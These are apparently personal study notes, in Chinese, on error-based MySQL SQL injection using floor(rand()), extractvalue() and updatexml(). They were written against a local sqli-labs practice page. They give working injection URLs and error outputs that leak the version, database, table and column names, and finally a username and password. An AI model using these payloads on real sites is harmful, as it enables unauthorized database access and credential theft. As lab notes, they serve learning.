报错注入方法

1.floor()

1.1 introduce:

    对rand函数操作时产生错误

1.2 principle analysis

原理未知，在网站找到一个类似的：https://www.freebuf.com/column/235496.html
但是我按照别人的方法并不能产生错误

1.3 sql:

select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2));

1.4 sql analysis:

concat():连接字符串
floor()：取float的整数值
rand()：取0~1之间随机浮点值
group by：根据一个或多个列对结果集进行分组并有排序功能

1.5 sql execution return:

ERROR 1062 (23000): Duplicate entry '5.5.44-0ubuntu0.14.04.11' for key 'group_key'

1.6 brower url:

http://localhost/Less-1/?id=1' and (select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2)));--+

1.7 optimized url:

http://localhost/Less-1/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select version()),0x7e,floor(rand(0)*2)));--+

1.8 optimized url execution return:

Duplicate entry '~5.5.44-0ubuntu0.14.04.1~1' for key 'group_key' 

1.9 extension:

1.9.1 查询库名

http://localhost/Less-1/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select schema_name from information_schema.schemata limit 4,1),0x7e,floor(rand(0)*2)));--+

return:

Duplicate entry '~security~1' for key 'group_key'

1.9.2 查询表名

http://localhost/Less-1/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e,floor(rand(0)*2)));--+

return:

Duplicate entry '~emails~1' for key 'group_key'

or (区别在于将table_schema='security’换成了database())

http://localhost/Less-1/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)));--+

return:

Duplicate entry '~emails~1' for key 'group_key' 

1.9.3 查询列名

http://localhost/Less-1/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e,floor(rand(0)*2)));--+

return:

Duplicate entry '~id~1' for key 'group_key'

1.9.4 查看列信息

http://localhost/Less-1/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e,floor(rand(0)*2)));--+

return:

Duplicate entry '~Dumb~Dumb~1' for key 'group_key'

2.extractvalue()

2.1 introduce extractvalue() function:

第一个参数：XML_document是String格式，为XML文档对象的名称，图中为Doc
第二个参数：XPath_string(XPath格式的字符串)
作用：从目标XML中返回包含所查询值的字符串

2.2 principle analysis:

XPath语法错误产生报错

2.3 sql:

select extractvalue(1,concat(0x7e,(select user()),0x7e));

2.4 sql execution return:

ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'

updatexml()

3.1 introduce updatexml() function:

第一个参数：XML_document是String格式，为XML文档对象的名称，图中为Doc
第二个参数：XPath_string(XPath格式的字符串)
第三个参数：new_value，String格式，替换查找到的符合条件的数据
作用：改变文档中符合条件的节点的值

3.2 principle analysis:

updataxml()语法错误产生报错

3.3sql:

select updatexml(1,concat(0x7e,(select user()),0x7e),1);

3.4sql execution return:

ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'